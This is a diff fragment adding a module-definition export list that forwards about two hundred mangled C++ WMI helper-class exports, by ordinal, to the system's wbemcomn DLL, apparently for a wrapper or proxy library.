+    ??0CInsertionString@@QEAA@PEBG@Z=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@PEBG@Z @56
+    ??0CInsertionString@@QEAA@VCHex@@@Z=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@VCHex@@@Z @57
+    ??0CInsertionString@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@XZ @58
+    ??0CInstructionQueue@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CInstructionQueue@@QEAA@XZ @59
+    ??0CInstructionTest@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CInstructionTest@@QEAA@$$QEAV0@@Z @60
+    ??0CInstructionTest@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CInstructionTest@@QEAA@AEBV0@@Z @61
+    ??0CInstructionTest@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CInstructionTest@@QEAA@XZ @62
+    ??0CLifeControl@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CLifeControl@@QEAA@$$QEAV0@@Z @63
+    ??0CLifeControl@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CLifeControl@@QEAA@AEBV0@@Z @64
+    ??0CLifeControl@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CLifeControl@@QEAA@XZ @65
+    ??0CLike@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CLike@@QEAA@AEBV0@@Z @66
+    ??0CLike@@QEAA@PEBGG@Z=C:/Windows/System32/wbemcomn.??0CLike@@QEAA@PEBGG@Z @67
+    ??0CLike@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CLike@@QEAA@XZ @68
+    ??0CLimitControl@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CLimitControl@@QEAA@AEBV0@@Z @69
+    ??0CLimitControl@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CLimitControl@@QEAA@XZ @70
+    ??0CMRCICompression@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CMRCICompression@@QEAA@XZ @71
+    ??0CMRCIControl@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CMRCIControl@@QEAA@XZ @72
+    ??0CMUILocaleList@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CMUILocaleList@@QEAA@XZ @73
+    ??0CMemoryLog@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CMemoryLog@@QEAA@XZ @74
+    ??0CMinMaxLimitControl@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CMinMaxLimitControl@@QEAA@$$QEAV0@@Z @75
+    ??0CMinMaxLimitControl@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CMinMaxLimitControl@@QEAA@AEBV0@@Z @76
+    ??0CMinMaxLimitControl@@QEAA@HPEBG@Z=C:/Windows/System32/wbemcomn.??0CMinMaxLimitControl@@QEAA@HPEBG@Z @77
+    ??0CNtAce@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CNtAce@@QEAA@AEBV0@@Z @78
+    ??0CNtAce@@QEAA@KKKAEAVCNtSid@@@Z=C:/Windows/System32/wbemcomn.??0CNtAce@@QEAA@KKKAEAVCNtSid@@@Z @79
+    ??0CNtAce@@QEAA@KKKPEAG@Z=C:/Windows/System32/wbemcomn.??0CNtAce@@QEAA@KKKPEAG@Z @80
+    ??0CNtAce@@QEAA@PEAU_ACCESS_ALLOWED_ACE@@@Z=C:/Windows/System32/wbemcomn.??0CNtAce@@QEAA@PEAU_ACCESS_ALLOWED_ACE@@@Z @81
+    ??0CNtAce@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CNtAce@@QEAA@XZ @82
+    ??0CNtAcl@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CNtAcl@@QEAA@AEBV0@@Z @83
+    ??0CNtAcl@@QEAA@K@Z=C:/Windows/System32/wbemcomn.??0CNtAcl@@QEAA@K@Z @84
+    ??0CNtAcl@@QEAA@PEAU_ACL@@@Z=C:/Windows/System32/wbemcomn.??0CNtAcl@@QEAA@PEAU_ACL@@@Z @85
+    ??0CNtSecurityDescriptor@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CNtSecurityDescriptor@@QEAA@AEAV0@@Z @86
+    ??0CNtSecurityDescriptor@@QEAA@PEAX@Z=C:/Windows/System32/wbemcomn.??0CNtSecurityDescriptor@@QEAA@PEAX@Z @87
+    ??0CNtSecurityDescriptor@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CNtSecurityDescriptor@@QEAA@XZ @88
+    ??0CNtSid@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CNtSid@@QEAA@AEBV0@@Z @89
+    ??0CNtSid@@QEAA@PEAG@Z=C:/Windows/System32/wbemcomn.??0CNtSid@@QEAA@PEAG@Z @90
+    ??0CNtSid@@QEAA@PEAX@Z=C:/Windows/System32/wbemcomn.??0CNtSid@@QEAA@PEAX@Z @91
+    ??0CNtSid@@QEAA@W4SidType@0@@Z=C:/Windows/System32/wbemcomn.??0CNtSid@@QEAA@W4SidType@0@@Z @92
+    ??0CNtSid@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CNtSid@@QEAA@XZ @93
+    ??0CPropertyName@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CPropertyName@@QEAA@AEBV0@@Z @94
+    ??0CPropertyName@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CPropertyName@@QEAA@XZ @95
+    ??0CQl1ParseSink@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CQl1ParseSink@@QEAA@$$QEAV0@@Z @96
+    ??0CQl1ParseSink@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CQl1ParseSink@@QEAA@AEBV0@@Z @97
+    ??0CQl1ParseSink@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CQl1ParseSink@@QEAA@XZ @98
+    ??0CRegistryMinMaxLimitControl@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CRegistryMinMaxLimitControl@@QEAA@$$QEAV0@@Z @99
+    ??0CRegistryMinMaxLimitControl@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CRegistryMinMaxLimitControl@@QEAA@AEBV0@@Z @100
+    ??0CRegistryMinMaxLimitControl@@QEAA@HPEBG0000@Z=C:/Windows/System32/wbemcomn.??0CRegistryMinMaxLimitControl@@QEAA@HPEBG0000@Z @101
+    ??0CSafeArray@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CSafeArray@@QEAA@AEAV0@@Z @102
+    ??0CSafeArray@@QEAA@HHHH@Z=C:/Windows/System32/wbemcomn.??0CSafeArray@@QEAA@HHHH@Z @103
+    ??0CSafeArray@@QEAA@PEAUtagSAFEARRAY@@HHH@Z=C:/Windows/System32/wbemcomn.??0CSafeArray@@QEAA@PEAUtagSAFEARRAY@@HHH@Z @104
+    ??0CStaticCritSec@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CStaticCritSec@@QEAA@XZ @105
+    ??0CTextTemplate@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CTextTemplate@@QEAA@AEBV0@@Z @106
+    ??0CTextTemplate@@QEAA@PEBG@Z=C:/Windows/System32/wbemcomn.??0CTextTemplate@@QEAA@PEBG@Z @107
+    ??0CTimerGenerator@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CTimerGenerator@@QEAA@AEBV0@@Z @108
+    ??0CTimerGenerator@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CTimerGenerator@@QEAA@XZ @109
+    ??0CTimerInstruction@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CTimerInstruction@@QEAA@AEBV0@@Z @110
+    ??0CTimerInstruction@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CTimerInstruction@@QEAA@XZ @111
+    ??0CTraceSessionControl@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CTraceSessionControl@@QEAA@XZ @112
+    ??0CUnk@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CUnk@@QEAA@AEBV0@@Z @113
+    ??0CUnk@@QEAA@PEAVCLifeControl@@PEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.??0CUnk@@QEAA@PEAVCLifeControl@@PEAUIUnknown@@@Z @114
+    ??0CUnkInternal@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CUnkInternal@@QEAA@AEBV0@@Z @115
+    ??0CUnkInternal@@QEAA@PEAVCLifeControl@@@Z=C:/Windows/System32/wbemcomn.??0CUnkInternal@@QEAA@PEAVCLifeControl@@@Z @116
+    ??0CVar@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@AEBV0@@Z @117
+    ??0CVar@@QEAA@D@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@D@Z @118
+    ??0CVar@@QEAA@E@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@E@Z @119
+    ??0CVar@@QEAA@F@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@F@Z @120
+    ??0CVar@@QEAA@FH@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@FH@Z @121
+    ??0CVar@@QEAA@G@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@G@Z @122
+    ??0CVar@@QEAA@HPEAG@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@HPEAG@Z @123
+    ??0CVar@@QEAA@HPEAUtagSAFEARRAY@@@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@HPEAUtagSAFEARRAY@@@Z @124
+    ??0CVar@@QEAA@HVauto_bstr@@@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@HVauto_bstr@@@Z @125
+    ??0CVar@@QEAA@J@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@J@Z @126
+    ??0CVar@@QEAA@K@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@K@Z @127
+    ??0CVar@@QEAA@M@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@M@Z @128
+    ??0CVar@@QEAA@N@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@N@Z @129
+    ??0CVar@@QEAA@PEADH@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEADH@Z @130
+    ??0CVar@@QEAA@PEAGH@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEAGH@Z @131
+    ??0CVar@@QEAA@PEAU_FILETIME@@@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEAU_FILETIME@@@Z @132
+    ??0CVar@@QEAA@PEAU_GUID@@H@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEAU_GUID@@H@Z @133
+    ??0CVar@@QEAA@PEAUtagBLOB@@H@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEAUtagBLOB@@H@Z @134
+    ??0CVar@@QEAA@PEAUtagVARIANT@@@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEAUtagVARIANT@@@Z @135
+    ??0CVar@@QEAA@PEAVCVarVector@@H@Z=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@PEAVCVarVector@@H@Z @136
+    ??0CVar@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CVar@@QEAA@XZ @137
+    ??0CVarVector@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CVarVector@@QEAA@AEAV0@@Z @138
+    ??0CVarVector@@QEAA@HHH@Z=C:/Windows/System32/wbemcomn.??0CVarVector@@QEAA@HHH@Z @139
+    ??0CVarVector@@QEAA@HPEAUtagSAFEARRAY@@H@Z=C:/Windows/System32/wbemcomn.??0CVarVector@@QEAA@HPEAUtagSAFEARRAY@@H@Z @140
+    ??0CVarVector@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CVarVector@@QEAA@XZ @141
+    ??0CWMITraceSettings@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CWMITraceSettings@@QEAA@XZ @142
+    ??0CWQLScanner@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CWQLScanner@@QEAA@AEAV0@@Z @143
+    ??0CWQLScanner@@QEAA@PEAVCGenLexSource@@@Z=C:/Windows/System32/wbemcomn.??0CWQLScanner@@QEAA@PEAVCGenLexSource@@@Z @144
+    ??0CWStringArray@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CWStringArray@@QEAA@AEAV0@@Z @145
+    ??0CWStringArray@@QEAA@HH@Z=C:/Windows/System32/wbemcomn.??0CWStringArray@@QEAA@HH@Z @146
+    ??0CWbemCallSecurity@@AEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CWbemCallSecurity@@AEAA@AEBV0@@Z @147
+    ??0CWbemCallSecurity@@AEAA@XZ=C:/Windows/System32/wbemcomn.??0CWbemCallSecurity@@AEAA@XZ @148
+    ??0CWbemCriticalSection@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CWbemCriticalSection@@QEAA@XZ @149
+    ??0CWbemInstallObject@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CWbemInstallObject@@QEAA@XZ @150
+    ??0CWbemInterval@@IEAA@K@Z=C:/Windows/System32/wbemcomn.??0CWbemInterval@@IEAA@K@Z @151
+    ??0CWbemInterval@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CWbemInterval@@QEAA@XZ @152
+    ??0CWbemTime@@IEAA@_J@Z=C:/Windows/System32/wbemcomn.??0CWbemTime@@IEAA@_J@Z @153
+    ??0CWbemTime@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CWbemTime@@QEAA@AEBV0@@Z @154
+    ??0CWbemTime@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CWbemTime@@QEAA@XZ @155
+    ??0CWbemTimeSpan@@QEAA@HHHHHHH@Z=C:/Windows/System32/wbemcomn.??0CWbemTimeSpan@@QEAA@HHHHHHH@Z @156
+    ??0CWin32DefaultArena@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CWin32DefaultArena@@QEAA@AEBV0@@Z @157
+    ??0CWin32DefaultArena@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CWin32DefaultArena@@QEAA@XZ @158
+    ??0QL1_Parser@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0QL1_Parser@@QEAA@AEBV0@@Z @159
+    ??0QL1_Parser@@QEAA@PEAVCGenLexSource@@@Z=C:/Windows/System32/wbemcomn.??0QL1_Parser@@QEAA@PEAVCGenLexSource@@@Z @160
+    ??0QL_LEVEL_1_RPN_EXPRESSION@@QEAA@AEBU0@@Z=C:/Windows/System32/wbemcomn.??0QL_LEVEL_1_RPN_EXPRESSION@@QEAA@AEBU0@@Z @161
+    ??0QL_LEVEL_1_RPN_EXPRESSION@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0QL_LEVEL_1_RPN_EXPRESSION@@QEAA@XZ @162
+    ??0QL_LEVEL_1_TOKEN@@QEAA@AEBU0@@Z=C:/Windows/System32/wbemcomn.??0QL_LEVEL_1_TOKEN@@QEAA@AEBU0@@Z @163
+    ??0QL_LEVEL_1_TOKEN@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0QL_LEVEL_1_TOKEN@@QEAA@XZ @164
+    ??0Registry@@QEAA@PEAUHKEY__@@KKPEBG@Z=C:/Windows/System32/wbemcomn.??0Registry@@QEAA@PEAUHKEY__@@KKPEBG@Z @165
+    ??0Registry@@QEAA@PEAUHKEY__@@KPEBG@Z=C:/Windows/System32/wbemcomn.??0Registry@@QEAA@PEAUHKEY__@@KPEBG@Z @166
+    ??0Registry@@QEAA@PEBGK@Z=C:/Windows/System32/wbemcomn.??0Registry@@QEAA@PEBGK@Z @167
+    ??0Registry@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0Registry@@QEAA@XZ @168
+    ??0WString2@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@AEBV0@@Z @169
+    ??0WString2@@QEAA@KPEAUHINSTANCE__@@@Z=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@KPEAUHINSTANCE__@@@Z @170
+    ??0WString2@@QEAA@PEAGH@Z=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@PEAGH@Z @171
+    ??0WString2@@QEAA@PEBD@Z=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@PEBD@Z @172
+    ??0WString2@@QEAA@PEBG@Z=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@PEBG@Z @173
+    ??0WString2@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@XZ @174
+    ??0WString2@@QEAA@_K@Z=C:/Windows/System32/wbemcomn.??0WString2@@QEAA@_K@Z @175
+    ??0WString@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0WString@@QEAA@AEBV0@@Z @176
+    ??0WString@@QEAA@KPEAUHINSTANCE__@@@Z=C:/Windows/System32/wbemcomn.??0WString@@QEAA@KPEAUHINSTANCE__@@@Z @177
+    ??0WString@@QEAA@PEAGH@Z=C:/Windows/System32/wbemcomn.??0WString@@QEAA@PEAGH@Z @178
+    ??0WString@@QEAA@PEBD@Z=C:/Windows/System32/wbemcomn.??0WString@@QEAA@PEBD@Z @179
+    ??0WString@@QEAA@PEBG@Z=C:/Windows/System32/wbemcomn.??0WString@@QEAA@PEBG@Z @180
+    ??0WString@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0WString@@QEAA@XZ @181
+    ??1?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@XZ @182
+    ??1?$SZLess@PEBG@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1?$SZLess@PEBG@@UEAA@XZ @183
+    ??1C9XAce@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1C9XAce@@UEAA@XZ @184
+    ??1CAbstractQl1Parser@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CAbstractQl1Parser@@UEAA@XZ @185
+    ??1CBaseAce@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CBaseAce@@UEAA@XZ @186
+    ??1CBasicUnloadInstruction@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CBasicUnloadInstruction@@UEAA@XZ @187
+    ??1CBuffer@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CBuffer@@QEAA@XZ @188
+    ??1CCheckedInCritSec@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CCheckedInCritSec@@QEAA@XZ @189
+    ??1CClientOpsNode@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CClientOpsNode@@QEAA@XZ @190
+    ??1CCritSec@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CCritSec@@QEAA@XZ @191
+    ??1CDMTFParser@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CDMTFParser@@QEAA@XZ @192
+    ??1CDatePart@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CDatePart@@QEAA@XZ @193
+    ??1CDateTimeParser@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CDateTimeParser@@QEAA@XZ @194
+    ??1CEnterWbemCriticalSection@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CEnterWbemCriticalSection@@QEAA@XZ @195
+    ??1CEventLog@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CEventLog@@QEAA@XZ @196
+    ??1CEventLogRecord@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CEventLogRecord@@QEAA@XZ @197
+    ??1CExecQueue@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CExecQueue@@QEAA@XZ @198
+    ??1CExecRequest@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CExecRequest@@UEAA@XZ @199
+    ??1CFlexArray@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CFlexArray@@QEAA@XZ @200
+    ??1CFlexQueue@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CFlexQueue@@QEAA@XZ @201
+    ??1CHaltable@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CHaltable@@UEAA@XZ @202
+    ??1CIdentitySecurity@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CIdentitySecurity@@QEAA@XZ @203
+    ??1CIdentityTest@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CIdentityTest@@QEAA@XZ @204
+    ??1CInCritSec@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CInCritSec@@QEAA@XZ @205
+    ??1CInsertionString@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CInsertionString@@QEAA@XZ @206
+    ??1CInstructionQueue@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CInstructionQueue@@QEAA@XZ @207
+    ??1CLike@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CLike@@QEAA@XZ @208
+    ??1CLimitControl@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CLimitControl@@UEAA@XZ @209
+    ??1CMRCICompression@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CMRCICompression@@QEAA@XZ @210
+    ??1CMUILocaleList@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CMUILocaleList@@QEAA@XZ @211
+    ??1CMinMaxLimitControl@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CMinMaxLimitControl@@UEAA@XZ @212
+    ??1CNtAce@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CNtAce@@UEAA@XZ @213
+    ??1CNtAcl@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CNtAcl@@QEAA@XZ @214
+    ??1CNtSecurityDescriptor@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CNtSecurityDescriptor@@QEAA@XZ @215
+    ??1CNtSid@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CNtSid@@QEAA@XZ @216
+    ??1CPropertyName@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CPropertyName@@QEAA@XZ @217
+    ??1CPublishWMIOperationEvent@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CPublishWMIOperationEvent@@QEAA@XZ @218
+    ??1CRegistryMinMaxLimitControl@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CRegistryMinMaxLimitControl@@UEAA@XZ @219
+    ??1CSafeArray@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CSafeArray@@QEAA@XZ @220
+    ??1CStaticCritSec@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CStaticCritSec@@QEAA@XZ @221
+    ??1CTextTemplate@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CTextTemplate@@QEAA@XZ @222
+    ??1CTimerGenerator@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CTimerGenerator@@UEAA@XZ @223
+    ??1CTimerInstruction@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CTimerInstruction@@UEAA@XZ @224
+    ??1CUnk@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CUnk@@UEAA@XZ @225
+    ??1CUnkInternal@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1CUnkInternal@@UEAA@XZ @226
+    ??1CVar@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CVar@@QEAA@XZ @227
+    ??1CVarVector@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CVarVector@@QEAA@XZ @228
+    ??1CWQLScanner@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CWQLScanner@@QEAA@XZ @229
+    ??1CWStringArray@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CWStringArray@@QEAA@XZ @230
+    ??1CWbemCallSecurity@@AEAA@XZ=C:/Windows/System32/wbemcomn.??1CWbemCallSecurity@@AEAA@XZ @231
+    ??1CWbemCriticalSection@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CWbemCriticalSection@@QEAA@XZ @232
+    ??1CWbemInstallObject@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CWbemInstallObject@@QEAA@XZ @233
+    ??1CWin32DefaultArena@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1CWin32DefaultArena@@QEAA@XZ @234
+    ??1QL1_Parser@@UEAA@XZ=C:/Windows/System32/wbemcomn.??1QL1_Parser@@UEAA@XZ @235
+    ??1QL_LEVEL_1_RPN_EXPRESSION@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1QL_LEVEL_1_RPN_EXPRESSION@@QEAA@XZ @236
+    ??1QL_LEVEL_1_TOKEN@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1QL_LEVEL_1_TOKEN@@QEAA@XZ @237
+    ??1Registry@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1Registry@@QEAA@XZ @238
+    ??1WString2@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1WString2@@QEAA@XZ @239
+    ??1WString@@QEAA@XZ=C:/Windows/System32/wbemcomn.??1WString@@QEAA@XZ @240
+    ??4?$CLockableFlexArray@VCStaticCritSec@@@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4?$CLockableFlexArray@VCStaticCritSec@@@@QEAAAEAV0@$$QEAV0@@Z @241
+    ??4?$CLockableFlexArray@VCStaticCritSec@@@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4?$CLockableFlexArray@VCStaticCritSec@@@@QEAAAEAV0@AEAV0@@Z @242
+    ??4?$SZLess@PEBG@@QEAAAEAU0@AEBU0@@Z=C:/Windows/System32/wbemcomn.??4?$SZLess@PEBG@@QEAAAEAU0@AEBU0@@Z @243
+    ??4C9XAce@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4C9XAce@@QEAAAEAV0@AEBV0@@Z @244
+    ??4CAbstractQl1Parser@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CAbstractQl1Parser@@QEAAAEAV0@AEBV0@@Z @245
+    ??4CArena@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CArena@@QEAAAEAV0@$$QEAV0@@Z @246
+    ??4CArena@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CArena@@QEAAAEAV0@AEBV0@@Z @247
+    ??4CBaseAce@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CBaseAce@@QEAAAEAV0@AEBV0@@Z @248
+    ??4CBaseMrciCompression@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CBaseMrciCompression@@QEAAAEAV0@$$QEAV0@@Z @249
+    ??4CBaseMrciCompression@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CBaseMrciCompression@@QEAAAEAV0@AEBV0@@Z @250
+    ??4CBasicUnloadInstruction@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CBasicUnloadInstruction@@QEAAAEAV0@AEBV0@@Z @251
+    ??4CBuffer@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CBuffer@@QEAAAEAV0@AEBV0@@Z @252
+    ??4CCheckedInCritSec@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CCheckedInCritSec@@QEAAAEAV0@AEBV0@@Z @253
+    ??4CCircularQueue@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CCircularQueue@@QEAAAEAV0@$$QEAV0@@Z @254
+    ??4CCircularQueue@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CCircularQueue@@QEAAAEAV0@AEBV0@@Z @255
+    ??4CClientOpsNode@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CClientOpsNode@@QEAAAEAV0@AEBV0@@Z @256
+    ??4CContainerControl@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CContainerControl@@QEAAAEAV0@$$QEAV0@@Z @257
+    ??4CContainerControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CContainerControl@@QEAAAEAV0@AEBV0@@Z @258
+    ??4CCritSec@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CCritSec@@QEAAAEAV0@AEBV0@@Z @259
+    ??4CDMTFParser@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CDMTFParser@@QEAAAEAV0@AEBV0@@Z @260
+    ??4CDatePart@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CDatePart@@QEAAAEAV0@AEBV0@@Z @261
+    ??4CDateTimeParser@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CDateTimeParser@@QEAAAEAV0@AEBV0@@Z @262
+    ??4CEnterWbemCriticalSection@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CEnterWbemCriticalSection@@QEAAAEAV0@AEBV0@@Z @263
+    ??4CExecQueue@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CExecQueue@@QEAAAEAV0@AEAV0@@Z @264
+    ??4CExecRequest@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CExecRequest@@QEAAAEAV0@AEBV0@@Z @265
+    ??4CFlexArray@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CFlexArray@@QEAAAEAV0@AEAV0@@Z @266
